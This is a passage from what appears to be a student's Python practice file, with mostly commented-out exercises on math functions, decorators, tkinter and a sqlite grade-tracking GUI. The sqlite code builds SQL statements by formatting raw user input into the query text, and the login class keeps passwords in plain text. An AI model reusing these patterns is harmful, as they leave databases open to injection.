in table.items():\r\n print('{0:10} ==> {1:10f}'.format(name, number))\r\n\"\"\"\r\n#最大公约数和最小公倍数\r\n\"\"\"\r\ndef gcd_lcm(x,y):\r\n if x%y==0:\r\n return y\r\n else:\r\n return gcd_lcm(y,x%y)\r\na,b=map(int,input(\"Pleae input two integers: :\").split())\r\nx=gcd_lcm(a,b)\r\nprint(\"The GCD of them is %d\\nThe LCM of them is %d\" %(x,a*b/x))\r\n\"\"\"\r\n#legendre\r\n\"\"\"\r\ndef legendre(x,n):\r\n if n==0:\r\n return 1\r\n elif n==1:\r\n return x\r\n else:\r\n return ((2*n-1)*x*legendre(x,n-1)-(n-1)*legendre(x,n-2))/n \r\na=float(input(\"Please input x:\"))\r\nb=int(input(\"Please input n:\"))\r\nprint(\"The result is %s\"%str(legendre(a,b)))\r\n\"\"\"\r\n#calender\r\n'''\r\nday=(myyear-1800)*365+mymonth*30\r\nfor x in range(1800,myyear+1):\r\n day+=isLeap(x)\r\nfor x in range(1,mymonth+1):\r\n day+=monthDay(x)\r\nprint(day//7,day%7)\r\n'''\r\n\"\"\"\r\nweek={'sun':-2,'mon':-1,'tue':0,'wed':1,'thu':2,'fri':3,'sat':4}\r\nweekday=list(week.keys())\r\ndef isLeap(x):\r\n x=1 if x%400==0 or x%4==0 and x%100!=0 else 0\r\n return x\r\ndef monthDay(x): \r\n if x<=7:\r\n y=31 if x%2==1 else 30 \r\n else:\r\n y=31 if x%2==0 else 30\r\n y=28+isLeap(myyear) if x==2 else y\r\n return y\r\ndef prWeek():\r\n print('-'*49)\r\n for x in range(7):\r\n print(weekday[x].title().rjust(7),end=\"\")\r\n print('')\r\ndef calender():\r\n for x in range(6):\r\n for y in range(7):\r\n if y<=5 and week[weekday[y]]>week[weekday[y+1]]:\r\n week[weekday[y+1]]+=7\r\n a=week[weekday[y]]+7*x\r\n b=str(a) if a>0 and a<=monthDay(mymonth) else ''\r\n print(b.rjust(7),end=\"\")\r\n print(\"\")\r\ndef firstWeek():\r\n for z in range(1800,myyear):\r\n for y in range(7):\r\n week[weekday[y]]=week[weekday[y]]-(365+isLeap(z))%7\r\n if week[weekday[y]]<=-6 :\r\n week[weekday[y]]+=7\r\n if mymonth>1:\r\n for x in range(mymonth-1):\r\n for y in range(7):\r\n week[weekday[y]]=week[weekday[y]]+28-monthDay(x+1) \r\n if week[weekday[y]]<=-6 :\r\n week[weekday[y]]+=7\r\nmyyear,mymonth=map(int,input(\"please input the year and month:\").split())\r\nfirstWeek()\r\nprWeek()\r\ncalender()\r\n\"\"\"\r\n#登录\r\n'''\r\nclass account:\r\n name=''\r\n code=''\r\n agcode='' \r\n def __init__(self):\r\n self.name=input(\"请输入用户名:\")\r\n while(1):\r\n self.code=input(\"请输入密码: \")\r\n if self.exco(self.code)=='':break \r\n while(1):\r\n self.agcode=input('请再次输入密码:')\r\n if self.agcode==self.code:break\r\n print(\"两次输入的密码不一致\")\r\n print(\"注册成功!\")\r\n def exco(self,x):\r\n y=''\r\n y='密码必须包含字母' if x.isdigit() else y\r\n y='密码必须包含数字' if x.isalpha() else y\r\n y='密码长度至少8位' if len(x)<8 else y\r\n if y!='':print(y)\r\n return y\r\n def log(self):\r\n myname,mycode=input('请输入用户名:'),input('请输入密码登录,你有三次机会:')\r\n n=0\r\n while(n<2): \r\n if self.name==myname and self.code==mycode:\r\n print('登陆成功')\r\n break\r\n else:\r\n mycode=input('密码错误,请重新输入:')\r\n n+=1\r\n else:print('登陆失败')\r\nme=account()\r\nme.log()\r\n'''\r\n#创建用户登录(未完成)\r\n'''\r\nclass account:\r\n code=''\r\n agcode='' \r\n def __init__(self):\r\n \r\n while(1):\r\n self.code=input(\"请输入密码: \")\r\n if self.exco(self.code)=='':break \r\n while(1):\r\n self.agcode=input('请再次输入密码:')\r\n if self.agcode==self.code:break\r\n print(\"两次输入的密码不一致\")\r\n print(\"注册成功!\")\r\n def exco(self,x):\r\n y=''\r\n y='密码必须包含字母' if x.isdigit() else y\r\n y='密码必须包含数字' if x.isalpha() else y\r\n y='密码长度至少8位' if len(x)<8 else y\r\n if y!='':print(y)\r\n return y\r\n def log(self):\r\n myname,mycode=input('请输入用户名:'),input('请输入密码登录,你有三次机会:')\r\n n=0\r\n while(n<2): \r\n if buname==myname and self.code==mycode:\r\n print('登陆成功')\r\n break\r\n else:\r\n mycode=input('密码错误,请重新输入:')\r\n n+=1\r\n else:print('登陆失败')\r\nwhile(1):\r\n name=input('请输入用户名:')\r\n buname=name\r\n locals()[name]=account()\r\n locals()[name].log()\r\n'''\r\n#格式化输入与输出\r\n\"\"\"\r\ntable = {'Google': 1, 'Runoob': 2, 'Taobao': 3}\r\nprint('{0[Runoob]:5}{0[Taobao]:2} {1:8}{2:3}'.format(table,\"hah\",99))\r\n\"\"\"\r\n'''\r\nf = open(\"C:/Users/早开的晚霞/Desktop/foo.txt\", \"rb+\")\r\nf.write(b'0123456789abcdef')\r\n#f.write( \"Python 是一个非常好的语言。\\n是的,的确非常好!!\\n\" )\r\n#str1=f.readlines()\r\n#print(str1)\r\n#for line in f:\r\n# print(line, end='')\r\nprint(f.tell())\r\nf.seek(-1,2)\r\nprint(f.read(1))\r\n# 关闭打开的文件\r\nf.close()\r\n'''\r\n'''\r\n\r\nimport pickle\r\n\r\n# 使用pickle模块将数据对象保存到文件\r\ndata1 = {'a': [1, 2.0, 3, 4+6j],\r\n 'b': ('string', u'Unicode string'),\r\n 'c': None}\r\n\r\nselfref_list = [1, 2, 3]\r\nselfref_list.append(selfref_list)\r\n\r\noutput = open('data.pkl', 'wb')\r\n\r\n# Pickle dictionary using protocol 0.\r\npickle.dump(data1, output)\r\n\r\n# Pickle the list using the highest protocol available.\r\npickle.dump(selfref_list, output, -1)\r\n\r\noutput.close()\r\n'''\r\n'''\r\nimport pprint, pickle\r\n\r\n#使用pickle模块从文件中重构python对象\r\npkl_file = open('data.pkl', 'rb')\r\n\r\ndata1 = pickle.load(pkl_file)\r\npprint.pprint(data1)\r\n\r\ndata2 = pickle.load(pkl_file)\r\npprint.pprint(data2)\r\n\r\npkl_file.close()\r\n'''\r\n#装饰器1\r\n\"\"\"\r\ndef hi():\r\n def greet():\r\n return \"hah\"\r\n def welcom():\r\n return \"233\"\r\n return greet if 2 else welcom\r\nprint(hi()())\r\ndef hello():\r\n return \"233\"\r\ndef do(x):\r\n print(x())\r\ndo(hello)\r\n\r\ndef deco(x):\r\n def inf():\r\n print(\"www\")\r\n x()\r\n print(\"qqqq\")\r\n return inf\r\ndef rede():\r\n print(\"eeee\")\r\nrede()\r\nrede=deco(rede)\r\nrede()\r\n@deco # @deco等价于 ha=deco(ha)\r\ndef ha():\r\n print(\"nnnn\")\r\nha()\r\nprint(ha.__name__) #ha被inf取代了\r\n#以下是调用functools.wrpas函数解决\r\nfrom functools import wraps\r\ndef a_new_decorator(a_func):\r\n @wraps(a_func) #将wraps函数作为装饰\r\n def wrapTheFunction():\r\n print(\"I am doing some boring work before executing a_func()\")\r\n a_func()\r\n print(\"I am doing some boring work after executing a_func()\")\r\n return wrapTheFunction\r\n \r\n@a_new_decorator\r\ndef a_function_requiring_decoration():\r\n \r\n print(\"I am the function which needs some decoration to \"\r\n \"remove my foul smell\")\r\na_function_requiring_decoration()\r\nprint(a_function_requiring_decoration.__name__) #正常输出\r\n\"\"\"\r\n#装饰器2\r\n\"\"\"\r\nfrom functools import wraps\r\ndef decorator_name(f):\r\n @wraps(f)\r\n def decorated():\r\n if not can_run:\r\n return \"Function will not run\"\r\n return f()\r\n return decorated\r\n \r\n@decorator_name\r\ndef func():\r\n return(\"Function is running\")\r\n \r\ncan_run = True\r\nprint(func())\r\n# Output: Function is running\r\n \r\ncan_run = False\r\nprint(func())\r\n\r\n\r\ndef logit(func):\r\n @wraps(func)\r\n def with_logging(*args, **kwargs):\r\n print(func.__name__ + \" was called\")\r\n return func(*args, **kwargs)\r\n return with_logging\r\n \r\n@logit\r\ndef addition_func(x):\r\n\r\n return x + x\r\n \r\n \r\nresult = addition_func(4)\r\nprint(result)\r\n\r\n\r\n\r\nfrom functools import wraps\r\ndef logit(logfile='out.txt'):\r\n def logging_decorator(func):\r\n @wraps(func)\r\n def wrapped_function(*args, **kwargs):\r\n log_string = func.__name__ + \" was called\"\r\n print(log_string)\r\n # 打开logfile,并写入内容\r\n with open(logfile, 'a') as opened_file:\r\n # 现在将日志打到指定的logfile\r\n opened_file.write(log_string + '\\n')\r\n return func(*args, **kwargs)\r\n return wrapped_function\r\n return logging_decorator \r\n@logit()\r\ndef myfunc1():\r\n pass\r\n \r\nmyfunc1()\r\n# Output: myfunc1 was called\r\n# 现在一个叫做 out.log 的文件出现了,里面的内容就是上面的字符串\r\n\r\n@logit(logfile='func2.txt')\r\ndef myfunc2():\r\n pass\r\n \r\nmyfunc2()\r\n# Output: myfunc2 was called\r\n# 现在一个叫做 func2.log 的文件出现了,里面的内容就是上面的字符串\r\n\r\nfrom functools import wraps\r\nclass wa():\r\n a=1\r\n b=2\r\n def __call__(self,x): #类的调用函数\r\n @wraps(x)\r\n def ha():\r\n print(self.a+1)\r\n return x()\r\n return ha\r\n@wa()\r\ndef we():\r\n print(\"2333\")\r\nwe()\r\n\"\"\"\r\n\r\n#利用__或者property装饰器进行私有变量的定义\r\n\"\"\"\r\nclass Vector2D(object):\r\n def __init__(self, x, y):\r\n self.x = float(x)\r\n self.y = float(y)\r\n\r\n @property\r\n def a(self):\r\n return self.x\r\n @property\r\n def b(self):\r\n return self.y\r\n @b.setter\r\n def b(self,c):\r\n self.y=c\r\n\r\nv = Vector2D(3, 4)\r\nprint(v.a, v.b)\r\nv.b = 8 \r\nprint(v.b)\r\n\r\nclass ha():\r\n def __init__(self):\r\n self.__a=3\r\n def wee(self):\r\n return self.__a+6\r\njj=ha()\r\nc=jj.wee()\r\nprint(c)\r\nprint(jj.__a)\r\n\"\"\"\r\n\r\n#__slots__对类的外部添加进行限制,内部变量命名不能重复,如果重复需要用__init__进行命名\r\n\"\"\"\r\nclass ha():\r\n __slots__ = [\"x\", 'y']\r\n def __init__(self):\r\n self.x = 1\r\nwe=ha()\r\nwe.z=4\r\nprint(we.z)\r\n\r\nclass Dog(object):\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n\r\nclass Cat(object):\r\n __slots__ = [\"name\"]\r\n\r\n def __init__(self, name):\r\n self.name = name\r\n\r\nd = Dog(\"dog\")\r\nd.age = 23\r\nprint(d.age)\r\nc = Cat(\"cat\")\r\nprint(c.name)\r\nc.age = 24\r\n\r\nclass ha():\r\n \r\n __slots__ = []\r\n s=3\r\nwe=ha()\r\n\r\nprint(we.s)\r\nwe.x=4\r\nprint(we.x)\r\n\r\n\"\"\"\r\n#实验二\r\n\"\"\"\r\nnum=[0]\r\nstudent=[]\r\na=0\r\ntxt=('学号','姓名','数学','语文','英语')\r\ndef welcome():\r\n print(\"欢迎进入教务处学生成绩系统\")\r\n print('1. 学生成绩录入\\n2. 学生成绩修改\\n3. 查询学生成绩\\n4. 学生成绩排名\\n5. 退出系统')\r\n num[0]=int(input(\"请输入功能序号进入相应功能:\"))\r\ndef again(x):\r\n def txtpr():\r\n x()\r\n if input(\"\\n是否继续(1-继续)(0-停止):\")=='1':return txtpr() \r\n return txtpr\r\ndef prtxt():\r\n for x in range(5):print(txt[x].rjust(6+len(txt[x])), end='')\r\n print(\"\")\r\n for z in range(a):\r\n for x in range(5):\r\n print(student[z][x].rjust(7+len(txt[x])),end='')\r\n print('')\r\n\r\n@again\r\ndef entry(): \r\n student.append([input(\"请输入学生%s:\"%txt[x]) for x in range(5)])\r\n global a\r\n a+=1\r\n prtxt()\r\n@again\r\ndef chansco():\r\n am=input(\"请输入学生学号:\")\r\n q=0\r\n k=0\r\n for z in range(a):\r\n if am in student[z][0]:q=z\r\n print('1. 数学成绩修改\\n2. 语文成绩修改\\n3. 英语成绩修改\\n ')\r\n k=int(input(\"请输入功能序号进入相应功能:\"))\r\n if k==1:student[q][2]=input(\"数学成绩修改为:\")\r\n elif k==2:student[q][3]=input(\"语文成绩修改为:\")\r\n else:student[q][4]=input(\"英语成绩修改为:\") \r\n@again\r\ndef check():\r\n am=input(\"请输入学生学号:\")\r\n q=0\r\n k=0\r\n for z in range(a): \r\n if am in student[z][0]:q=z\r\n for x in range(5):print(txt[x].rjust(8), end='')\r\n print(\"\")\r\n for x in range(5):print(student[q][x].rjust(7+len(txt[x])),end='')\r\n@again\r\ndef level():\r\n print(\"1.��照学号排序\\n2.按照姓名排序\\n3.按照数学成绩排序\\n4.按照语文成绩排序\\n5.按照英语成绩排序\\n6.按照总分排序\")\r\n k=int(input(\"请输入功能序号进入相应功能:\"))\r\n def takese(ele):\r\n return (ele[k-1]) if k!=6 else int(ele[2])+int(ele[3])+int(ele[4])\r\n student.sort(key=takese,reverse=True)\r\n prtxt()\r\nwhile num[0]!=5:\r\n welcome()\r\n if num[0]==1:\r\n entry()\r\n if num[0]==2:\r\n chansco()\r\n if num[0]==3:\r\n check()\r\n if num[0]==4:\r\n level()\r\n\"\"\"\r\n#tkinter模块1\r\n\"\"\"\r\nimport tkinter as tk\r\nws=tk.Tk()\r\nws.title('hah')\r\nws.geometry('500x300')\r\nvar=tk.StringVar()\r\nl=tk.Label(ws,textvariable=var,bg='green', font=('Arial', 12), width=30, height=2)\r\nl.pack()\r\non_hit=False\r\ndef hit():\r\n global on_hit\r\n if on_hit == False:\r\n on_hit = True\r\n var.set('you hit me')\r\n else:\r\n on_hit = False\r\n var.set('')\r\nb=tk.Button(ws,text=\"233\",font=('Arial', 12),activebackground='red',width=10,height=1,command=hit)\r\nb.pack()\r\ne1=tk.Entry(ws,show=None)\r\ne2=tk.Entry(ws,show='2')\r\ne1.pack()\r\ne2.pack()\r\ndef insert_point(): # 在鼠标焦点处插入输入内容\r\n vars = e1.get()\r\n t.insert('insert', vars)\r\ndef insert_end(): # 在文本框内容最后接着插入输入内容\r\n vars = e1.get()\r\n t.insert('end', vars)\r\nb1 = tk.Button(ws, text='insert point', width=10,\r\n height=2, command=insert_point)\r\nb1.pack()\r\nb2 = tk.Button(ws, text='insert end', width=10,\r\n height=2, command=insert_end)\r\nb2.pack()\r\nt = tk.Text(ws, height=3)\r\nt.pack()\r\nws.mainloop()\r\n\"\"\"\r\n#tkinter2\r\n\"\"\"\r\nimport tkinter as tk\r\nwindow=tk.Tk()\r\nwindow.geometry('300x300')\r\nvar2 = tk.StringVar()\r\nvar2.set((1,2,3,4)) # 为变量var2设置值\r\n# 创建Listbox\r\nlb = tk.Listbox(window, listvariable=var2,width=10,height=2)\r\nlb.pack()\r\nvar = tk.StringVar() # 定义一个var用来将radiobutton的值和Label的值联系在一起.\r\nl = tk.Label(window, bg='yellow', width=20, text='empty')\r\nl.pack()\r\ndef print_selection():\r\n l.config(bg='blue')\r\nr1 = tk.Radiobutton(window, text=' A', variable=var, value='A', command=print_selection)\r\nr1.pack()\r\nr2 = tk.Radiobutton(window, text='B', variable=var, value='B', command=print_selection)\r\nr2.pack()\r\nc1 = tk.Checkbutton(window, text='Python',variable=var, onvalue=1, offvalue=0, command=print_selection) # 传值原理类似于radiobutton部件\r\nc1.pack()\r\nc2 = tk.Checkbutton(window, text='C++',variable=var, onvalue=1, offvalue=0, command=print_selection)\r\nc2.pack()\r\ndef print_selection1(v):\r\n l.config(text='you have'+v)\r\ns = tk.Scale(window, label='try me', from_=0, to=10, orient=tk.HORIZONTAL, length=200, showvalue=0,tickinterval=2, resolution=0.01, command=print_selection1)\r\ns.pack()\r\n\"\"\"\r\n\"\"\"\r\nimport tkinter as tk \r\n \r\nwindow = tk.Tk()\r\nwindow.title('My Window')\r\nwindow.geometry('500x300') \r\ncanvas = tk.Canvas(window, bg='green', height=200, width=500)\r\nimage_file = tk.PhotoImage(file='pic.gif') \r\nimage = canvas.create_image(250, 0, anchor='n',image=image_file) \r\n#image=canvas.create_image(250,0,anchor='n',image=tk.PhotoImage(file='pic.gif'))\r\ncanvas.pack()\r\ndef moveit():\r\n canvas.move(image, 2, 2) \r\n \r\n\r\nb = tk.Button(window, text='move item',command=moveit).pack()\r\nwindow.mainloop()\r\n\"\"\"\r\n#双重字典查询\r\n\"\"\"\r\nhit = {\r\n'01':{'name':'航天学院', 'url':'http://sa.hit.edu.cn/'},\r\n'02':{'name':'电信学院', 'url':'http://seie.hit.edu.cn/'},\r\n'03':{'name':'机电学院', 'url':'http://sme.hit.edu.cn/'},\r\n'04':{'name':'材料学院', 'url':'http://mse.hit.edu.cn/'},\r\n'05':{'name':'能源学院', 'url':'http://power.hit.edu.cn/'},\r\n'06':{'name':'电气学院', 'url':'http://hitee.hit.edu.cn/'},\r\n'07':{'name':'仪器学院', 'url':'http://ise.hit.edu.cn/'},\r\n'08':{'name':'数学学院', 'url':'http://math.hit.edu.cn/'},\r\n'09':{'name':'物理学院', 'url':'http://physics.hit.edu.cn/'},\r\n'10':{'name':'经管学院', 'url':'http://som.hit.edu.cn/'},\r\n'11':{'name':'土木学院', 'url':'http://civil.hit.edu.cn/'},\r\n'12':{'name':'环境学院', 'url':'http://env.hit.edu.cn/'},\r\n'13':{'name':'建筑学院', 'url':'http://jzxy.hit.edu.cn/'},\r\n'14':{'name':'交通学院', 'url':'http://jtxy.hit.edu.cn/'},\r\n'15':{'name':'化工学院', 'url':'http://chemeng.hit.edu.cn/'},\r\n'16':{'name':'生命学院', 'url':'http://life.hit.edu.cn/'},\r\n'17':{'name':'外语学院', 'url':'http://fls.hit.edu.cn/'},\r\n'18':{'name':'人文学院', 'url':'http://rwxy.hit.edu.cn/'},\r\n'19':{'name':'计算机学院', 'url':'http://cs.hit.edu.cn/'},\r\n'20':{'name':'马克思学院', 'url':'http://marx.hit.edu.cn/'}\r\n}\r\nnum=0\r\ndef welcome():\r\n global num\r\n print(\"欢迎进入教务处学院查询系统\")\r\n print('1. 按编号查询\\n2. 按名称查询\\n3. 退出')\r\n num=int(input(\"请输��功能序号进入相应功能:\"))\r\ndef nu():\r\n x=input('请输入编号:')\r\n try:print(hit[x])\r\n except KeyError:\r\n print(\"查询失败\")\r\n return nu()\r\ndef na():\r\n x=input('请输入学院名称:')\r\n v=iter(hit.values())\r\n for i in range(20):\r\n s=next(v)\r\n if s['name']==x:return '0'+str(i+1)+'\\t'+s['url'] if i+1<10 else str(i+1)+'\\t'+s['url']\r\n else:\r\n print(\"查询失败\")\r\n return na()\r\n \r\nwhile(1):\r\n welcome()\r\n if num==1:nu()\r\n elif num==2:print(na())\r\n else:break\r\n\"\"\"\r\n\r\n#sqlitey与tkinter运用实例\r\n'''\r\nimport sqlite3 as sq\r\nimport tkinter as tk\r\nimport tkinter.messagebox \r\ndef entry():\r\n display.frame.pack_forget()\r\n fr=tk.Frame(display.ws)\r\n fr.pack(fill=\"both\", expand=True)\r\n def ha():\r\n fr.pack_forget()\r\n display.frame.pack()\r\n display.ws.mainloop()\r\n for i in range(5):l1=tk.Label(fr,text=tex[i]+\":\").place(x=150,y=40+i*30)\r\n t1=tk.Entry(fr,show = None)\r\n t1.place(x=220,y=40)\r\n t2=tk.Entry(fr,show = None)\r\n t2.place(x=220,y=70)\r\n t3=tk.Entry(fr,show = None)\r\n t3.place(x=220,y=100)\r\n t4=tk.Entry(fr,show = None)\r\n t4.place(x=220,y=130)\r\n t5=tk.Entry(fr,show = None)\r\n t5.place(x=220,y=160)\r\n def sub():\r\n try:\r\n c.execute(\"insert into student values({0},'{1}',{2},{3},{4})\".format(t1.get(),t2.get(),t3.get(),t4.get(),t5.get()))\r\n con.commit()\r\n except : tk.messagebox.showwarning(title='警告', message='请勿重复提交学生信息!')\r\n s1=tk.Button(fr,text=\"提交\",activebackground='#0000a3',command=sub).place(x=220,y=190)\r\n s2=tk.Button(fr,text=\"结束\",activebackground='#0000a3',command=ha).place(x=300,y=190)\r\n display.ws.mainloop()\r\ndef chansco():\r\n display.frame.pack_forget()\r\n fr=tk.Frame(display.ws)\r\n fr.pack(fill=\"both\", expand=True)\r\n def ha():\r\n fr.pack_forget()\r\n display.frame.pack()\r\n display.ws.mainloop()\r\n l1=tk.Label(fr,text=\"学生学号:\").place(x=150,y=40)\r\n t1=tk.Entry(fr,show = None)\r\n t1.place(x=220,y=40)\r\n t2=tk.Entry(fr,show = None)\r\n t2.place(x=220,y=70)\r\n var1 = tk.StringVar() \r\n var2 = tk.StringVar()\r\n var1.set('修改项目')\r\n var2.set(('姓名','语文',\"数学\",\"英语\"))\r\n def gai():\r\n try:\r\n if var1.get()!='姓名':v=list(c.execute(\"update student set {0}={1} where 学号={2} \".format(var1.get(),t2.get(),t1.get())))\r\n else:v=list(c.execute(\"update student set {0}='{1}' where 学号={2} \".format(var1.get(),t2.get(),t1.get())))\r\n con.commit()\r\n except :tk.messagebox.showwarning(title='警告', message='请按照正确格式输入!')\r\n def wa(event):\r\n lb.place(x=150,y=100,width=60,height=100) \r\n def za(event):\r\n lb.place_forget()\r\n def we(event):\r\n value = lb.get(lb.curselection())\r\n var1.set(value)\r\n l2=tk.Button(fr,textvariable=var1)\r\n l2.place(x=150,y=70) \r\n l2.bind(\"\", wa)\r\n l2.bind(\"\", za)\r\n lb = tk.Listbox(fr, listvariable=var2,width=20)\r\n lb.bind(\"\", wa)\r\n lb.bind(\"\", za) \r\n lb.bind('',we)\r\n s1=tk.Button(fr,text=\"提交\",activebackground='#0000a3',command=gai).place(x=220,y=160)\r\n s2=tk.Button(fr,text=\"结束\",activebackground='#0000a3',command=ha).place(x=300,y=160)\r\ndef check():\r\n display.frame.pack_forget()\r\n fr=tk.Frame(display.ws)\r\n fr.pack(fill=\"both\", expand=True)\r\n def ha():\r\n fr.pack_forget()\r\n display.frame.pack()\r\n display.ws.mainloop()\r\n l1=tk.Label(fr,text=\"学生学号:\").place(x=150,y=40)\r\n t1=tk.Entry(fr,show = None)\r\n t1.place(x=220,y=40)\r\n var1=tk.StringVar()\r\n var2=tk.StringVar()\r\n var3=tk.StringVar()\r\n var4=tk.StringVar()\r\n var5=tk.StringVar()\r\n ls1=tk.Label(fr,text=\"姓名\").place(x=120,y=70)\r\n ls2=tk.Label(fr,text=\"语文\").place(x=160,y=70)\r\n ls3=tk.Label(fr,text=\"英语\").place(x=200,y=70)\r\n ls4=tk.Label(fr,text=\"数学\").place(x=240,y=70)\r\n ls5=tk.Label(fr,text=\"总分\").place(x=280,y=70)\r\n lts1=tk.Label(fr,textvariable=var1)\r\n lts2=tk.Label(fr,textvariable=var2)\r\n lts3=tk.Label(fr,textvariable=var3)\r\n lts4=tk.Label(fr,textvariable=var4)\r\n lts5=tk.Label(fr,textvariable=var5)\r\n def cha():\r\n try:\r\n cur=list(c.execute(\"select * from student where 学号={}\".format(t1.get())))\r\n var1.set(cur[0][1])\r\n lts1.place(x=120,y=90)\r\n var2.set(cur[0][2])\r\n lts2.place(x=160,y=90)\r\n var3.set(cur[0][3])\r\n lts3.place(x=200,y=90)\r\n var4.set(cur[0][4])\r\n lts4.place(x=240,y=90)\r\n var5.set(cur[0][2]+cur[0][3]+cur[0][4])\r\n lts5.place(x=280,y=90)\r\n except :tk.messagebox.showwarning(title='警告', message='无当前学生信息!')\r\n s1=tk.Button(fr,text=\"查询\",activebackground='#0000a3',command=cha).place(x=220,y=160)\r\n s2=tk.Button(fr,text=\"结束\",activebackground='#0000a3',command=ha).place(x=300,y=160)\r\ndef level():\r\n display.frame.pack_forget()\r\n fr=tk.Frame(display.ws,width=500,height=300)\r\n fr.pack()\r\n def insco():\r\n sb=tk.Scrollbar(display.ws,orient=\"vertical\",)\r\n sb.place(x=50,y=25,height=200)\r\n tx=tk.Text(fr,bg=\"#00f\")\r\n tx.place(x=50,y=25,width=200,height=200)\r\n sb.configure(command=tx.yview)\r\n def ha():\r\n fr.pack_forget()\r\n display.frame.pack()\r\n display.ws.mainloop()\r\n var1 = tk.StringVar()\r\n var2 = tk.StringVar()\r\n var1.set('排序方式')\r\n var2.set(tex)\r\n def wa(event):\r\n lb.place(x=20,y=80,width=60,height=120) \r\n def za(event):\r\n lb.place_forget()\r\n def we(event):\r\n value = lb.get(lb.curselection())\r\n var1.set(value)\r\n def sor(): \r\n try:\r\n sb=tk.Scrollbar(fr,orient=\"vertical\")\r\n sb.place(x=440,y=25,height=200)\r\n tx=tk.Canvas(fr,bg=\"#00f\")\r\n tx.place(x=80,y=25,width=360,height=200)\r\n ul=tk.Text(tx)\r\n ul.place(width=360,height=200)\r\n sb.config(command=ul.yview)\r\n ul.config(yscrollcommand=sb.set)\r\n \r\n hau=list(c.execute(\"select * from student order by {} desc\".format(var1.get())))\r\n a=list(c.execute(\"select count(学号) from student \"))\r\n for i in range(5):\r\n ul.insert(tk.END,'{0}'.format(tex[i]).center(8))\r\n ul.insert(tk.END,'\\n')\r\n for j in range(a[0][0]):\r\n for i in range(5):\r\n if i==0:ul.insert(tk.END,'{0}'.format(hau[j][i]).ljust(12))\r\n elif i==1:ul.insert(tk.END,'{0}'.format(hau[j][i]).ljust(12-len(hau[j][i])))\r\n else:ul.insert(tk.END,'{0}'.format(hau[j][i]).ljust(9))\r\n ul.insert(tk.END,'\\n')\r\n except:tk.messagebox.showwarning(title='警告', message='请选择排序方式!')\r\n l2=tk.Button(fr,textvariable=var1)\r\n l2.place(x=20,y=50) \r\n l2.bind(\"\", wa)\r\n l2.bind(\"\", za)\r\n lb = tk.Listbox(fr, listvariable=var2,width=20,height=10)\r\n lb.bind(\"\", wa)\r\n lb.bind(\"\", za) \r\n lb.bind('',we)\r\n s1=tk.Button(fr,text=\"排序\",activebackground='#0000a3',command=sor).place(x=120,y=250)\r\n s2=tk.Button(fr,text=\"结束\",activebackground='#0000a3',command=ha).place(x=200,y=250)\r\ndef dexit():\r\n display.ws.destroy()\r\n con.commit()\r\nclass window():\r\n ws=tk.Tk()\r\n frame = tk.Frame(ws)\r\n frame.pack()\r\n def __init__(self):\r\n self.ws.title('哈工大教务处学生成绩系统')\r\n self.ws.geometry('500x300')\r\n def users(self):\r\n l=tk.Label(self.frame,text='欢迎进入教务处学生成绩系统',fg=\"#fff\",bg='#00006e', font=('Microsoft Yahei UI', 12), width=30, height=2).pack()\r\n b1=tk.Button(self.frame,text=\"学生成绩录入\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=entry).pack()\r\n b2=tk.Button(self.frame,text=\"学生信息修改\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=chansco).pack()\r\n b3=tk.Button(self.frame,text=\"查询学生成绩\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=check).pack()\r\n b4=tk.Button(self.frame,text=\"学生成绩排名\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=level).pack()\r\n b5=tk.Button(self.frame,text=\"退出\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=dexit).pack()\r\n self.ws.mainloop()\r\ncon=sq.connect(\"hit.db\")\r\nc=con.cursor()\r\ntex=(\"学号\",\"姓名\",\"语文\",\"英语\",\"数学\")\r\n#c.execute(create table student(学号 int primary key not null,姓名 text not null,语文 int,英语 int,数学 int);)\r\ncon.commit()\r\ndisplay=window()\r\ndisplay.users()\r\n'''\r\n#作业5-1\r\n\"\"\"\r\nclass person():\r\n name=''\r\n age=''\r\n def __init__(self):\r\n self.name=input(\"请输入姓名:\")\r\n self.age=input(\"请输入年龄:\")\r\n def getPay(self):\r\n pass\r\n def pri(x):\r\n def pr(self):\r\n print('姓名:',self.name)\r\n print('年龄:',self.age)\r\n x(self)\r\n return pr\r\nclass Manager(person):\r\n money=0\r\n def __init__(self):\r\n person.__init__(self)\r\n def getPay(self):\r\n self.money=500000\r\n @person.pri\r\n def pri(self): \r\n print('薪水:',self.money)\r\nclass Employee(person):\r\n salary=''\r\n year=''\r\n money=0\r\n def __init__(self):\r\n person.__init__(self)\r\n self.salary=int(input(\"请输入月薪:\"))\r\n self.year=int(input(\"请输入年终奖:\"))\r\n def getPay(self):\r\n self.money=self.salary*12+self.year\r\n @person.pri\r\n def pri(self): \r\n print('薪水:',self.money)\r\nclass Salesman(person):\r\n salary=''\r\n profit=''\r\n money=0\r\n def __init__(self):\r\n person.__init__(self)\r\n self.salary=int(input(\"请输入月薪:\"))\r\n self.profit=int(input(\"请输入销售利润:\"))\r\n def getPay(self):\r\n self.money=int(self.salary*12+self.profit*0.15)\r\n @person.pri\r\n def pri(self): \r\n print('薪水:',self.money)\r\nwhile(1):\r\n try:\r\n job=input('请输入职务: ')\r\n if job=='Manager':man=Manager()\r\n elif job=='Employee':man=Employee()\r\n elif job=='Salesman':man=Salesman()\r\n man.getPay()\r\n man.pri()\r\n except NameError:print('请输入正确的职务(Manager\\Employee\\Salesman)')\r\n\"\"\"\r\n#beautiful soup\r\n\"\"\"\r\nfrom bs4 import BeautifulSoup as bs\r\nimport re\r\nhtm= \r\nThe Dormouse's story\r\n\r\n

The Dormouse's story

\r\n\r\n

Once upon a time there were three little sisters; and their names were\r\nElsie,\r\nLacie and\r\nTillie;\r\nand they lived at the bottom of a well.

\r\n\r\n

...

